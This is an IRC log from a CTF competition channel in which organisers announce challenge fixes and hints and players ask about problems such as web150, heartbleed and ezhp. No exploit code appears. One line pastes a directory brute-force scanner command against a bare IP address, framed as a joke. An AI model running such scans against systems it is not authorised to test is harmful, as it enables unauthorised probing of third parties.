(01:53:00) (sibios) auscompgeek, 5PM EDT Sunday, April 13
(01:53:01) (+frozencemetery) Xteven: pm
(01:53:07) (inter) CLOCKISH
(01:53:07) (inter) YO
(01:53:07) (inter) FUCK
(01:53:22) (+clockish) WAT
(01:53:30) (abc_) mtpox ?
(01:53:59) (inter) DUDE
(01:54:01) (inter) FUK
(01:54:02) (inter) FUK
(01:54:07) (inter) I THINK I JUST SAW THE LIGHT
(01:54:09) (inter) IN THE JAIL
(01:55:45) (arthurdent) you're doing this ctf from jail?
(01:55:47) (arthurdent) are you in for hacking?
(01:56:22) (+frozencemetery) wow, such hardk0re
(01:56:59) (|x_x|) I hope they are hacking by manipulating signals through a payphone handset using a tape recorder.
(01:57:05) qUit: (43UAABJS1) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34) Ping timeout: 240 seconds
(01:57:38) (pipecork) phreaky
(01:57:49) (auscompgeek) sibios: ah, ok.
(01:58:37) (arthurdent) |x_x|: i did that once
(02:00:54) (arthurdent) whoa somebody just mentioned virt in another hacker channel
(02:00:57) (arthurdent) he must be more famous than i thought
(02:08:23) (stypr_irccloud) internet crashed
(02:08:26) (stypr_irccloud) f...
(02:08:42) (arthurdent) the whole internet?
(02:08:47) (arthurdent) seems fine from here
(02:08:49) (+frozencemetery) you broke it
(02:09:03) (stypr_irccloud) my internet i meant
(02:09:14) (stypr_irccloud) seems like i didnt pay my bill
(02:14:38) jOin: (zTrix_) (~zTrix@2402:f000:d:8001:2969:4da7:2b93:32a0)
(02:14:40) (whois) bronies works?
(02:15:05) qUit: (abc_) (b44ac723@gateway/web/freenode/ip.180.74.199.35) Ping timeout: 240 seconds
(02:15:23) (18VAAD0FH) doing this solo is not fun, maybe next year will be better
(02:15:35) (18VAAD0FH) RED TEAM...OUT
(02:15:38) (+mserrano) whois: pm
(02:16:19) qUit: (knuckles) (
[email protected]) Remote host closed the connection
(02:17:06) jOin: (abcd_) (7b886a50@gateway/web/freenode/ip.123.136.106.80)
(02:17:21) jOin: (gbarboza) (~gbarboza@unaffiliated/sonicvanajr)
(02:17:55) jOin: (ChanServ) (ChanServ@services.)
(02:17:56) mOde: (sendak.freenode.net) sets (+o ChanServ)
(02:17:56) mOde: (ChanServ) sets (+v gbarboza)
(02:18:11) jOin: (dug) (~dug@unaffiliated/dug)
(02:18:11) nIck: (Sin__) is now known as (Guest91297)
(02:18:11) nIck: (ricky) is now known as (Guest97836)
(02:18:11) nIck: (crash) is now known as (Guest26684)
(02:18:11) nIck: (x56) is now known as (Guest64110)
(02:18:12) nIck: (dnivra) is now known as (Guest19451)
(02:18:12) nIck: (Amnesia) is now known as (Guest80055)
(02:18:13) nIck: (ikari) is now known as (Guest35713)
(02:18:14) jOin: (rray) (~rray@unaffiliated/rray)
(02:18:14) nIck: (MavJS) is now known as (Guest16009)
(02:18:19) jOin: (DrunkenPanda) (~mpex@unaffiliated/drunkenpanda)
(02:18:33) jOin: (wtbw) (~wtbw@unaffiliated/wtbw)
(02:18:34) jOin: (bool101) (~bool@unaffiliated/bool101)
(02:19:10) nIck: (Guest16009) is now known as (MavJS)
(02:19:17) jOin: (MavJS) (~maverick@fedora/MavJS)
(02:20:11) mOde: (ChanServ) sets (+v cai_)
(02:20:42) (ryan-c) can anyone answer a quick question about wheeeee?
(02:20:50) nIck: (Guest97836) is now known as (ricky)
(02:21:00) (+clockish) ryan-c: pm mserrano
(02:21:07) jOin: (ricky) (~ricky@fedora/ricky)
(02:21:07) mOde: (ChanServ) sets (+v ricky)
(02:21:09) (mrsmith67) for bronies - by client side exploits
(02:21:11) (mrsmith67) do you mean xss?
(02:21:16) (+mserrano) mrsmith67: ?
(02:21:17) qUit: (inter) (
[email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Would you like to know more?
(02:21:26) mOde: (ChanServ) sets (+v cai_)
(02:21:33) (mrsmith67) you say it shouldnt be solved by client side exploits
(02:21:35) (+mserrano) mrsmith67: we do not expect you to exploit webkit
(02:21:37) (ryan-c) mrsmith67: I think by 'client side exploits' they mean 'browser 0day'
(02:21:40) (mrsmith67) oh
(02:21:40) (+mserrano) yeah
(02:21:41) (mrsmith67) i see
(02:22:11) (+clockish) the problem being that there are some browser 100days that could be adapted...
(02:22:13) (mrsmith67) ok
(02:22:16) (mrsmith67) thats super unclear, heh
(02:22:18) (+clockish) but that's not an easy way to do the problem
(02:22:44) (bobsteam) theres an easy way? =P
(02:22:54) (+mserrano) easier than writing a webkit exploit.
(02:23:04) (bobsteam) hehe
(02:23:07) (+clockish) lol
(02:25:16) jOin: (j0f) (~amirreza@unaffiliated/j0f)
(02:25:45) (+ricky) ANNOUNCE: Bronies was broken (the admin wasn't logging onto the internal portal properly). Please retry your exploits. Apologies for the inconvenience
(02:27:05) (+mserrano) andddd there goes part 1
(02:27:09) (+ricky) Congrats to tomcr00se on part 1 :-)
(02:27:32) (+clockish) tomcr00se!
(02:29:03) nIck: (Guest91297) is now known as (Sin__)
(02:29:23) (tomcr00se) grr harry potter is frustrating
(02:30:07) (+ricky) Part 2's always there
(02:30:15) (+clockish) tomcr00se: and worth less points than bronies2!
(02:30:23) (tomcr00se) i have feels that might be worse
(02:30:27) (+mserrano) lol
(02:30:32) -marienz- [Global Notice] Services are back, running a recent backup of the database. If you (automatically) identified to nickserv without using SASL while services were split, your password might be compromised. Please change your nickserv password (/msg nickserv help set password) if this applies to you. The misconfiguration allowing this has been fixed. If you have questions, ask in #freenode. Thanks!
(02:30:40) (+clockish) also, gotta play the breakthru game
(02:30:48) (snoopybbt) hints on harry potter ?
(02:31:06) (+clockish) snoopybbt: hints will go on the website if any are released
(02:31:13) (snoopybbt) clockish: ok :)
(02:31:27) (iZsh) why are ppl always asking for hints after trying 10s
(02:31:45) (bool101) tomcr00se very much agree with you on harry_potter
(02:34:42) (18VAAD0FH) he is just a boy, a not so gifted boy, and he has such a task at hand, taking on Tom Riddle and all
(02:35:04) nIck: (gameredan) is now known as (Guest78627)
(02:35:45) qUit: (phiber__) (
[email protected]) Read error: Connection reset by peer
(02:38:50) ([GoN]Jakkdu) wow
(02:39:28) jOin: ([GoN]starmie) (8ff8eb9c@gateway/web/freenode/ip.143.248.235.156)
(02:40:47) (tomcr00se) doge_stege hint?
(02:41:18) (poppopret) tomcr00se asking for hints
(02:41:20) (poppopret) wat
(02:41:29) (+mserrano) tomcr00se: Doge. Stege.
(02:43:20) (+frozencemetery) y'all nerds don't know about norse gods
(02:43:37) (+mserrano) tomcr00se: First, you laugh at doge. Then, you doge stege.
(02:44:20) (+frozencemetery) then you become doge
(02:44:30) (18VAAD0FH) wow a hint haha
(02:44:40) (18VAAD0FH) someone is generous
(02:44:49) (poppopret) is that really a hint? lol
(02:44:50) (18VAAD0FH) norse gods like that gamer er gamr
(02:45:00) (robbje) who can I ask about tenement?
(02:45:45) (+frozencemetery) poppopret: I mean, freya is the name of a problem that's open...
(02:45:45) jOin: (nvs) (75d37463@gateway/web/cgi-irc/kiwiirc.com/ip.117.211.116.99)
(02:46:17) (jduck) scoreboard takes 500M of ram lol.
(02:46:30) (+mserrano) jduck: lolll
(02:46:34) (+mserrano) too much ajax
(02:46:58) (robbje) anyone? :)
(02:46:59) (jduck) oh nm, thats the play board. a second ago the scoreboard was taking 1.2gb
(02:47:06) (jduck) i reloaded and its not so bad
(02:47:12) (+mserrano) lolllllllllll
(02:47:30) (+mserrano) robbje: um
(02:47:37) (+mserrano) ping me briefly
(02:47:40) (+mserrano) but I don't know very much
(02:54:35) qUit: (asdfasdgag) (6cab7303@gateway/web/freenode/ip.108.171.115.3) Ping timeout: 240 seconds
(02:54:57) nIck: (18VAAD0FH) is now known as (asmoday)
(02:56:22) jOin: (installation) (76f3c589@gateway/web/freenode/ip.118.243.197.137)
(02:56:55) nIck: (toto) is now known as (Guest1734)
(02:57:37) (bobsteam) woot bronies!
(02:57:53) (+ricky) Nice!
(03:02:06) (iZsh) someone fully solved it?
(03:03:24) (robbje) wtf. tenement?
(03:03:49) (tomcr00se) omg childish gambino mentioned weev
(03:05:35) qUit: (installation) (76f3c589@gateway/web/freenode/ip.118.243.197.137) Ping timeout: 240 seconds
(03:07:57) (paul_axe) hi, who can i ask about reekee?
(03:09:46) (robbje) who wrote tenement :\
(03:10:07) (+frozencemetery) paul_axe: pm
(03:10:28) (+dickoff) tomcr00se: in what song?
(03:10:33) (+dickoff) robbje: gbarboza
(03:11:01) (robbje) gbarboza: you avail?
(03:11:04) (tomcr00se) Life: the biggest troll
(03:11:16) (+dickoff) robbje: he's probably asleep :/
(03:11:16) (robbje) oh nvm
(03:11:21) (robbje) it just dropped the flag
(03:11:33) (robbje) :>
(03:11:34) (+dickoff) robbje: :)
(03:11:35) (poppopret) who can i ask about web150?
(03:12:43) (+frozencemetery) poppopret: pm
(03:12:58) (robbje) lol i started 3 exploits, they almost all dropped the flag at the same time :D
(03:13:33) (+frozencemetery) three exploits is the new seven proxies
(03:13:54) (+ricky) Try exploting the web!
(03:15:05) qUit: (nvs) (75d37463@gateway/web/cgi-irc/kiwiirc.com/ip.117.211.116.99) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(03:17:28) (+ricky) Congrats DS on harry_potter!
(03:17:32) (+ricky) Now solve the "web"!
(03:17:55) nIck: (Guest19451) is now known as (dnivra)
(03:17:59) (hellman) nice on harry
(03:18:34) jOin: (dnivra) (~dnivra@unaffiliated/dnivra)
(03:18:42) (kiwhacks) can i have hint about web150 ?
(03:19:39) (almac) kiwhacks: did you see a hint was posted?
(03:19:46) (houqp_) kiwhacks: there are lots of hints: http://play.plaidctf.com/problems/hints
(03:19:55) nIck: (64MAAAR6O) is now known as (delusions)
(03:19:58) (auscompgeek) there are hints!?
(03:20:10) (+ricky) woo, more web solves - anybody going to get part 2?
(03:20:16) (almac) http://play.plaidctf.com/problems/hints
(03:20:18) (kiwhacks) almac, no i have'nt seen :/
(03:20:37) (almac) there aren't a lot, but it might help some
(03:20:57) (kiwhacks) thanks, but i'm after this step haha
(03:20:58) (tomcr00se) why are all hints for problems i solved?
(03:21:02) (auscompgeek) hmm, which way does the board go on the second half??
(03:21:12) (tomcr00se) _nightmare_ hint is needed :)
(03:21:14) (auscompgeek) this board thing is so confusing
(03:23:35) qUit: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Ping timeout: 240 seconds
(03:24:53) (+dickoff) auscompgeek: http://play.plaidctf.com/rules if you haven't seen it
(03:25:02) (bool101) grats Dragon Sector on harry_potter
(03:25:18) (Gynvael) tyty
(03:25:37) (j00ru) ;]
(03:25:44) (auscompgeek) dickoff: I looked at that before, but I'm still confused
(03:26:08) nIck: (Ali) is now known as (Guest48800)
(03:30:59) (abcd_) mtpox ?
(03:32:01) (+ricky) ANNOUNCE: Sorry, once again, please retry your bronies part 1 exploits. We think we fixed a bug that we breaking some attempts.
(03:32:39) jOin: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52)
(03:33:54) nIck: (AlephZero) is now known as (Guest76015)
(03:38:33) (+ricky) Anybody going for bronies 2?
(03:38:53) (+ricky) It's worth a game-changing amount of points :-P
(03:39:40) jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
(03:40:11) (cychao) is Freya (misc250) https server work?
(03:40:22) (houqp_) frozencemetery: ^
(03:40:34) (+frozencemetery) cychao: yes, it's working
(03:41:42) (+frozencemetery) cychao: we have a checker for that one
(03:41:59) (cychao) thank you
(03:42:04) (+frozencemetery) np; good luck :)
(03:46:35) qUit: (fixception) (322e9f29@gateway/web/freenode/ip.50.46.159.41) Ping timeout: 240 seconds
(03:50:45) jOin: (approximatehack) (7aa68c6a@gateway/web/freenode/ip.122.166.140.106)
(03:52:19) qUit: (ricky) (~ricky@fedora/ricky) Quit: Restarting
(03:52:42) jOin: (ricky) (~ricky@fedora/ricky)
(03:52:43) mOde: (ChanServ) sets (+v ricky)
(03:55:14) (kiwhacks) can i ask somebody in pm about web150 ?
(03:55:47) (+frozencemetery) kiwhacks: pm
(03:55:55) (kiwhacks) thanks :)
(03:57:27) (tomcr00se) omg harry potter was actually solved!
(03:57:37) jOin: (__vitor__) (806f3006@gateway/web/freenode/ip.128.111.48.6)
(03:58:08) (+ricky) Yup yup
(03:58:11) (+frozencemetery) umad?
(03:58:20) (+ricky) You should solve bronies 2 first though :-P
(03:58:42) (+ricky) It's enterprise grade software
(03:58:56) jOin: (nvs) (75d37463@gateway/web/cgi-irc/kiwiirc.com/ip.117.211.116.99)
(03:59:46) (tomcr00se) ugh i might still be awake enough to solve cats
(04:00:00) (tomcr00se) but not pwning
(04:00:28) (bobsteam) uhg cats
(04:03:18) (ryan-c) could some clarification be provided on the algo used by parlor?
(04:04:30) (hellman) +1
(04:04:45) (ryan-c) I cannot replicate the results it quotes
(04:06:30) qUit: ([2]Knight) (
[email protected]) Read error: Connection reset by peer
(04:09:58) (pd7) anyone around to answer a question about kpop?
(04:11:58) (ryan-c) frozencemetery or ricky?
(04:12:25) (+frozencemetery) ryan-c: sup?
(04:13:30) (ryan-c) frozencemetery: The algorithm used by parlor to generate numbers does not appear to match the description. Is this a bug, part of the challenge, or a failing on my part to understand it?
(04:13:48) jOin: (gameredan) (~gameredan@unaffiliated/gameredan)
(04:14:16) (+frozencemetery) our crypto people are currently asleep, sorry. We believe it is working as intended based on the POC that we have, but I don't have more information than that
(04:17:56) iNfo: These users have been split from (#pctf): okami41, pouete, ChanServ, DooMMasteR, Dad`, 64MAAAC71, foundation, hj, justinsteven, bspar, zenofex, f0rki, delusions, doom, dreyer, x6d61726b, stypr, MercX, epochtato, PoopyPantsSr, Aegil, silesm, gbarboza, Dettorer, dug, Zerith, dontpanic42 - check netsplits window for details!
(04:18:16) (ryan-c) frozencemetery: I just managed to figure it out, pming you.
(04:18:23) (+frozencemetery) ok
(04:18:51) mOde: (sendak.freenode.net) sets (+ov ChanServ gbarboza)
(04:19:11) iNfo: These users have rejoined (#pctf): okami41, pouete, ChanServ, DooMMasteR, Dad`, 64MAAAC71, foundation, hj, justinsteven, bspar, zenofex, f0rki, delusions, doom, dreyer, x6d61726b, stypr, MercX, epochtato, PoopyPantsSr, Aegil, silesm, Dettorer, gbarboza, dug, Zerith, dontpanic42 - check netsplits window for details!
(04:20:14) (DonnchaC) Can I ask someone something about Web150 in PM?
(04:20:49) (+frozencemetery) DonnchaC: pm
(04:20:49) jOin: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158)
(04:21:05) (tokki) OMG MISC10 THE MULTIPLICATION THINGY
(04:21:07) (tokki) I GET IT
(04:21:13) (tokki) :O
(04:22:24) (auscompgeek) I KNOW WHAT IT IS, BUT I CAN'T GET IT
(04:23:52) (pipecork) bummer
(04:23:55) (tokki) :O
(04:24:37) (auscompgeek) I'm pretty sure I understand what it is... but I can't seem to get the flag right.
(04:25:00) (HENLEYbls) Yeah ^^ it's a weird one
(04:25:46) qUit: (nvs) (75d37463@gateway/web/cgi-irc/kiwiirc.com/ip.117.211.116.99) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(04:26:13) (21WAAB8NP) give more clear parlor format :(
(04:27:54) (arthurdent) are we all still definitely 100% sure that rendesvous is working?
(04:28:09) (houqp_) yes
(04:28:20) (houqp_) [SH]mom_: just solved it
(04:28:36) ([SH]mom_) yup, totally works.
(04:29:15) ([SH]mom_) arthurdent: You must become one with the Onion.
(04:29:24) (houqp_) heh
(04:29:36) (houqp_) pm me if you think you have the correct answer
(04:31:00) (auscompgeek) NO
(04:31:20) (auscompgeek) DON'T PM houqp_
(04:31:22) (auscompgeek) :P
(04:31:26) (houqp_) lol
(04:31:58) (abcd_) web 150 ?
(04:32:57) (+frozencemetery) houqp_ is one of us; it's cool
(04:33:06) (auscompgeek) ah
(04:33:16) (houqp_) now you can pm me :P
(04:33:34) (houqp_) only for rendezvous tho
(04:34:04) (auscompgeek) wait, why is houqp connected to freenode twice
(04:34:14) (auscompgeek) and why isn't houqp_ identified
(04:34:27) (+frozencemetery) auscompgeek: the answer to both questions is "because netsplit"
(04:35:10) (auscompgeek) frozencemetery: ... right.
(04:35:45) (houqp_) because computer is hard
(04:35:48) (+frozencemetery) auscompgeek: look man, it was trench warfare all over again. Servers dropping, forced renicking... we've seen some shit
(04:35:54) (+frozencemetery) :)
(04:36:31) (auscompgeek) lol
(04:39:36) (+ricky) Anybody going for bronies 2? :-P
(04:40:36) (+ricky) Or bronies 1 for that matter - it should finally be quite solid now
(04:43:35) (arthurdent) [SH]mom_: i tried becoming one with a couple different onions, but no luck
(04:44:12) (+ricky) worthless hint: the method to login to eXtreme Secure Solutions Internal Login is *not* brute force!
(04:44:19) qUit: ([SH]mom_) (~SH]
[email protected]) Remote host closed the connection
(04:45:40) (criple_ripper) ricky it's not?? dammit i was 3.651546+e15 years away from login in :P
(04:46:29) (+frozencemetery) criple_ripper: jokes on youl we change the password every millenium
(04:48:27) ([ToH]rbino) is it normal that crypto375 always returns the same now?
(04:56:53) (Dr_Dinosaur) Hello?
(05:00:01) (chuckleberry) doctor
(05:00:03) (Sin__) who can i ping on whatscat?
(05:03:27) (+frozencemetery) Sin__: pm
(05:03:33) jOin: (ChakYi) (01ec7e5a@gateway/web/freenode/ip.1.236.126.90)
(05:04:59) qUit: (connection) (~connectio@hacktalk/staff/connection) Ping timeout: 276 seconds
(05:05:05) (nadar) Is there a reason why rsa is in forensics rather than crypto?
(05:05:21) nIck: ([1]Knight) is now known as (Knight1)
(05:05:28) (houqp_) [ToH]rbino: is returning random string to me
(05:06:24) (n00bz) any help for g++?
(05:13:23) jOin: (lermontov) (76f3c5a3@gateway/web/freenode/ip.118.243.197.163)
(05:13:35) (lermontov) how long $SECRET is in mtpox?
(05:14:19) (jduck) mov dil, 0xd0
(05:14:20) (jduck) oops
(05:15:04) (s_kunk) msg identify nickserv 123456
(05:15:06) (s_kunk) oopz
(05:15:40) (jduck) ./dirbuster http://54.198.150.4/
(05:15:42) (jduck) oops
(05:15:44) (+ricky) Hahah
(05:15:53) (s_kunk) hahaha
(05:16:08) (jduck) <3
(05:16:48) (architekt) :>
(05:17:34) (s_kunk) AnthraX101: ;)
(05:17:36) (AnthraX101) :P
(05:20:35) qUit: (lermontov) (76f3c5a3@gateway/web/freenode/ip.118.243.197.163) Ping timeout: 240 seconds
(05:20:44) qUit: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182) Quit: Page closed
(05:21:14) jOin: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182)
(05:24:05) qUit: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52) Ping timeout: 240 seconds
(05:24:33) jOin: (cxc7) (c0518434@gateway/web/freenode/ip.192.81.132.52)
(05:24:57) (auscompgeek) jduck: which server is that? ;)
(05:27:04) (jduck) cnn.gov
(05:27:35) (n00bz) who i can pm about web300?
(05:30:25) (+frozencemetery) n00bz: hit me
(05:32:21) (fasmotol) who can pm me about re250?
(05:32:46) (fasmotol) *i can pm to
(05:35:58) (Gynvael) who can i pm about pwn1000 ?
(05:36:12) (+ricky) I'm curious about pwn1000 too :-P
(05:36:29) (Gynvael) ricky: :D
(05:40:35) nIck: (21WAAB8NP) is now known as (hellman_)
(05:41:32) jOin: (bwn3r) (~n00b13@unaffiliated/nitsua)
(05:42:36) qUit: (abcd_) (7b886a50@gateway/web/freenode/ip.123.136.106.80) Quit: Page closed
(05:45:25) jOin: (Bono) (1b7f597e@gateway/web/freenode/ip.27.127.89.126)
(05:45:35) qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
(05:46:49) (n00bz) who i can pm about web300?
(05:47:37) (+frozencemetery) n00bz: hasn't changed; is still me
(05:47:49) (n00bz) sorry
(05:48:04) (n00bz) arrow keys trolled me :P
(05:48:36) (+frozencemetery) no worries :)
(05:50:33) (MavJS) /name
(05:50:38) nIck: (alamar) is now known as (julian)
(05:55:23) qUit: (bwn3r) (~n00b13@unaffiliated/nitsua) Ping timeout: 240 seconds
(05:55:42) qUit: (chunderstruck1) (
[email protected]) Read error: No route to host
(06:02:30) qUit: (poppopret) (
[email protected]) Read error: Connection reset by peer
(06:07:05) qUit: (deder) (d4293493@gateway/web/freenode/ip.212.41.52.147) Ping timeout: 240 seconds
(06:07:48) (auscompgeek) lol
(06:07:52) (auscompgeek) dem cursor keys
(06:09:51) (plaintext) so guess which challenge am i working on when my flatmate decides to come into my room at 5 am?
(06:10:10) (+ricky) Hahaha
(06:10:31) (+frozencemetery) pro
(06:10:35) (+dickoff) plaintext: he knows you're a brony now
(06:10:44) (+dickoff) you'll never convince him otherwise
(06:10:46) (+ricky) Well, the breakthrough is gone for bronies 1, let's see if anybody gets the 2nd flag :-)
(06:11:07) (+ricky) You can convince him if you exploit it
(06:11:37) qUit: (hoxy) (5d53a8a2@gateway/web/freenode/ip.93.83.168.162) Quit: Page closed
(06:13:49) jOin: (Beched) (6daa088b@gateway/web/freenode/ip.109.170.8.139)
(06:15:07) (zoku) what system is ezhp running?
(06:15:27) (foundation) x86
(06:15:33) (zoku) please help a brother outt
(06:15:44) (zoku) yeah, I figured foundation...
(06:15:55) (zoku) but, maybe what distro??
(06:15:55) (foundation) sorry, i had to
(06:16:13) (zoku) haha, np
(06:16:43) (+frozencemetery) we have not been distributing that information as far as I know
(06:16:44) (zoku) I'm sure I could find out but it'd be a PITA
(06:16:57) (zoku) damn
(06:18:01) (+ricky) Useless hint: sqlmap should not get you anywhere useful on bronies
(06:18:02) qUit: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128) Ping timeout: 246 seconds
(06:18:39) (+ricky) Also useless: trying every single mid on the pony site
(06:19:54) (nopple) they probably just wanted to look at all of the different captchas
(06:19:55) (Pitr_) mid as in midi?
(06:20:31) (+ricky) mid as in message id on the pony site
(06:21:30) (Hertz__) the site is fucking with me again
(06:22:23) jOin: (RDot) (2e000ac9@gateway/web/freenode/ip.46.0.10.201)
(06:22:35) (Beched) RDot: пес
(06:22:42) (RDot) ы
(06:24:05) qUit: (cxc7) (c0518434@gateway/web/freenode/ip.192.81.132.52) Ping timeout: 240 seconds
(06:24:21) (Ymgve) Who can I ask about parlor?
(06:24:49) (+frozencemetery) Ymgve: me; pm
(06:26:35) qUit: (Beched) (6daa088b@gateway/web/freenode/ip.109.170.8.139) Ping timeout: 240 seconds
(06:28:06) (approximatehack) any hints on mtpox?
(06:28:39) (houqp_) approximatehack: http://play.plaidctf.com/problems/hints
(06:30:00) jOin: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128)
(06:31:23) qUit: (RDot) (2e000ac9@gateway/web/freenode/ip.46.0.10.201) Quit: Page closed
(06:32:26) (mongo12) remove ponies captcha :'(
(06:32:32) jOin: (HeartLESS_) (2e000ac9@gateway/web/freenode/ip.46.0.10.201)
(06:32:38) (+ricky) Hehe
(06:32:43) (+ricky) I just refresh until I get Princess Celestia
(06:32:55) (+ricky) (Blame tylerni7 for the awesome captcha :-P)
(06:33:05) (mongo12) yeah, I've adopted the same technique :p
(06:33:07) (mongo12) hehe
(06:35:46) (corpille) who can i pm for bronies ?
(06:36:12) (houqp_) ricky: ^
(06:36:12) (Pitr_) keep your bronies in ur pants, bro
(06:36:17) (poppopret) is the website down?
(06:36:29) (Pitr_) ricky: you've just created a lot of bronies ..
(06:36:34) (houqp_) poppopret: refresh harder
(06:36:44) Pitr_ is out, daughter needs more ponies
(06:37:33) jOin: (pcc7) (c0518434@gateway/web/freenode/ip.192.81.132.52)
(06:37:49) (+ricky) Hehe
(06:38:03) (+ricky) Hi corpille
(06:38:15) Pitr_ makes a mental note to create a Juggalo-inspired challenge next time he organizes a CTF
(06:38:27) (Pitr_) People like juggalo's more than bronies
(06:39:23) (+frozencemetery) D: juggalos
(06:39:57) (corpille) Hi ricky i pm you ;)
(06:43:12) jOin: (rokko) (5775c785@gateway/web/freenode/ip.87.117.199.133)
(06:43:12) (+frozencemetery) ooh, BlueLotus got freya :D
(06:43:57) (auscompgeek) freenode's interserver lag is killing me
(06:45:35) (Pitr_) how many hours left?
(06:46:16) (pez) Pitr_: i guess 9h and 14 mins ?
(06:49:05) (rokko) who's an author of whatcats? :/
(06:49:30) (Pitr_) pez: cool! :D
(06:50:35) qUit: (ChakYi) (01ec7e5a@gateway/web/freenode/ip.1.236.126.90) Ping timeout: 240 seconds
(06:51:27) (cool_guy) server down
(06:51:29) +ricky wonders if anybody is anywhere on bronies 2 :-P
(06:51:48) qUit: (phiber__) (
[email protected]) Read error: Connection reset by peer
(06:51:50) (+ricky) cool_guy: Can you try refreshing? I know it's a little flakey around now
(06:53:43) jOin: (wheee) (75600123@gateway/web/freenode/ip.117.96.1.35)
(06:55:20) (+ricky) OK, website should be a little better now
(06:55:45) pArt: (epochtato) (~epochfail@ec2-54-252-29-104.ap-southeast-2.compute.amazonaws.com) "WeeChat 0.3.7"
(06:56:50) qUit: (Digihash) (
[email protected]) Remote host closed the connection
(06:58:44) (cool_guy) yaa.. its running now
(06:59:44) (wtbw) this may be a silly question, but how on earth does the movement work on the playboard?
(06:59:56) (wtbw) I have no idea how we just ended up on chance
(07:00:18) (wtbw) it's not even within 6 squares of the last spot!
(07:00:27) (auscompgeek) wtbw: the 1-6 wheel thing determines tiles you... wut
(07:00:32) (+frozencemetery) wtbw: squares with problems that are open are not counted
(07:00:42) (wtbw) frozencemetery: ahh that makes sense!
(07:00:46) (+frozencemetery) :)
(07:00:49) (auscompgeek) frozencemetery: NOW YOU TELL US!?
(07:00:55) (poppopret) is doge_stege supposed to be this hard? or am i getting tunnel vision
(07:01:13) (wtbw) frozencemetery: thanks
(07:02:15) (+ricky) Yuh-oh, Dragon Sector is catching up!
(07:02:22) (+frozencemetery) auscompgeek: I would hope that would have been observed already since this is our second trip around the board? That said, I am not frontend and did not make the site :)
(07:03:39) (+ricky) Hey Dragon Sector: May I suggest bronies to get you guys in first? :-P
(07:03:54) (_blasty_) :-\
(07:04:13) (sven) guess it's time to wake up and solve something again :-D
(07:04:25) (+frozencemetery) or go all the way old school - so old school it's new school - and worship the norse gods >:D
(07:04:27) (+ricky) I also recommend it to 0xffa if the want to maintain their first place :-)
(07:04:30) (wtbw) who wrote graphs btw?
(07:04:37) (_blasty_) I RECOMMEND NOT PUTTING OUT 800 PTS WEB CHALLENGES
(07:04:37) (_blasty_) FFS
(07:04:38) (_blasty_) :P
(07:04:43) +ricky advertises his problem equally to all teamss
(07:04:57) (+ricky) "Web" is my favorite category!
(07:05:29) (wtbw) I vote for a new category of "complexity theory" for problems like graphs
(07:05:31) (wtbw) I want more of those
(07:05:32) (wtbw) ;)
(07:05:36) qUit: (wheee) (75600123@gateway/web/freenode/ip.117.96.1.35) Ping timeout: 240 seconds
(07:05:38) (foundation) see , now you made _blasty_ angry. now he's gonna write in full caps for the rest of the game
(07:05:39) (+ricky) wtbw: I think it was tylerni7
(07:05:47) (wtbw) ricky: oh that would make sense
(07:06:13) (auscompgeek) I'm confused, where's my team on the board
(07:06:34) (auscompgeek) wait, is the board shared across teams?
(07:07:01) (auscompgeek) nobody explained this very well
(07:07:10) (houqp_) yes
(07:07:28) (wtbw) oh the board is shared??
(07:07:48) (houqp_) god, you finally notice it
(07:07:52) (wtbw) haha
(07:07:56) (wtbw) I only joined this morning!
(07:08:12) (wtbw) what determines when the chronosphere discharges?
(07:08:40) (wtbw) (I mean, I know there's a timer, but what starts it?)
(07:08:54) (auscompgeek) wtbw: nothing starts it, it resets itself (I think)
(07:09:03) (wtbw) on a regular basis? or decided by admins?
(07:09:27) (auscompgeek) I believe once the votes are calculated
(07:09:28) (+frozencemetery) wtbw: it discharges to maintain a certain number of unsolved problems
(07:09:38) (auscompgeek) oh, really?
(07:09:40) (wtbw) aha
(07:09:41) (+frozencemetery) when there are too few, it starts a countdown during which it gathers votes
(07:09:42) (mrsmith67) !timeleft
(07:09:46) (auscompgeek) ah, I see.
(07:09:54) (+frozencemetery) at the end of the countdown, it discharges and a problem is opened
(07:09:57) (+ricky) 8 hours 50 minutes
(07:10:01) (wtbw) well everyone vote 6, I'm clearly a reverser at a loose end
(07:10:01) (wtbw) :p
(07:10:16) (wtbw) (is soliciting votes allowed? :p)
(07:10:23) (auscompgeek) I'm confused as to where we are on the board
(07:10:25) (+ricky) Still enough time to solve bronies 2 maybe!
(07:10:36) (wtbw) auscompgeek: one of the chances
(07:10:43) (wtbw) by the magnifying glass
(07:10:46) (houqp_) auscompgeek: http://play.plaidctf.com/rules
(07:11:04) (auscompgeek) ah, I see now
(07:11:12) (auscompgeek) houqp_: I've read that already :P
(07:11:23) (auscompgeek) it's hard to see that crosshatching
(07:11:28) (houqp_) ok :)
(07:11:42) (auscompgeek) wait, which direction are we going
(07:13:07) (wtbw) away from the black swirly portal
(07:13:47) (+frozencemetery) the portal is the connection between the two sides of the board
(07:13:58) (wtbw) hmm
(07:14:00) (wtbw) the only one?
(07:14:06) (wtbw) I thought the run along the top was too
(07:14:15) (+frozencemetery) no, it also rolls over due to integer overflow :)
(07:14:20) (+frozencemetery) you can think of it as a metaphor for the all-consuming black hole that is progress
(07:14:26) (wtbw) lol
(07:14:26) (+frozencemetery) or you can treat it as a plot device
(07:14:28) (wtbw) jesus.
(07:14:37) (+frozencemetery) y'know, whichever lets you sleep at night
(07:14:46) (wtbw) it would be easier if the board just showed where each roll would get you next
(07:14:46) (wtbw) ;)
(07:15:21) (Tapyroe__) is there anyone I can ask a quick question about heartbleed? seem to have some trouble submitting the flag..
(07:15:38) (+ricky) Tapyroe__: feel free to PM
(07:16:57) (n00bz) anyone could help me with ezhp?
(07:17:20) (zoku) I'm struggling with that myself
